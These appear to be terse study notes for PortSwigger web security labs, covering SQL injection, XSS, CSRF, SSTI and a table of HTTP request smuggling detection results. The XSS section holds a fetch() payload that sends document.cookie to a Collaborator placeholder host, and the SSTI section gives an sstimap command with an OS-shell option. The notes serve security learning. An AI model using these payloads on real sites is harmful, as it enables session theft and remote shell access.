Not all injections can be detected with ' or " or ` . Use Burp Scanner
Lab: Blind SQL injection with time delays:
XSS
HTML Entities work fine inside events (converting character to html entity which reflected inside an event doesn't mean it is escaped)
Fetch Function
fetch("https://BURP-COLLAB",{method:"POST",mode:"cors",body:document.cookie});
CSRF
Setting the Cookie without SameSite restriction make the browser use Lax by default, and in this case the cookie could be sent in cross-site POST request in the first 120 seconds after setting the cookie.
In this case you need to refresh(reset) the cookie before the exploit.
SSTI
Command for Detection & Exploitation
./sstimap.py -u https://www.example.net/?msg=test
-e : for selecting Template ex: ERB
--os-shell : for opening an interactive shell
New lines After and Before the hex number of Chunked Transfer
Before
0: 1 line (2 lines if it is in the body of the first request)
After
0: 2 lines
else: 1
Identification: Burp Scanner vs HTTP Request Smuggling Extension
Note: Burp Scanner doesn't show if it is TE.CL or CL.TE
Lab ID is based on the sort of labs in the All Labs page on PortSwigger
Testing on 10 Oct 2023
Lab ID: is based on the sort of the labs in PortSwigger's All Labs page
Lab ID
Scanner
Extension
1
✅
✅(Smuggle Probe)
2
✅
✅(Smuggle Probe)
3
✅
✅(Smuggle Probe)
4
✅
✅(Smuggle Probe)
5
✅
✅(Smuggle Probe)
6
✅
✅(Smuggle Probe)
7
✅
✅(Smuggle Probe)
8
❌
✅(HTTP/2 probe)
9
❌
❌ (All Scans Response: H2.TE❌) - (Correct is H2.CL✅)
10
❌
❌ (All Scans Response: H2.TE&Dual Path Support❌) - (Correct is H2 Injection via CRLF✅)
11
❌
❌ (All Scans Response: Dual Path Support ONLY❌) - (Correct is H2 Req Splitting via CRLF✅)
12
❌
✅Needs testing on every endpoint ⚠⚠
13
✅
✅(Smuggle Probe)
14
✅
✅(Smuggle Probe)
15
✅
✅(Smuggle Probe)
TE.CL
Second Req must have those headers and with high content-length than what it have in the body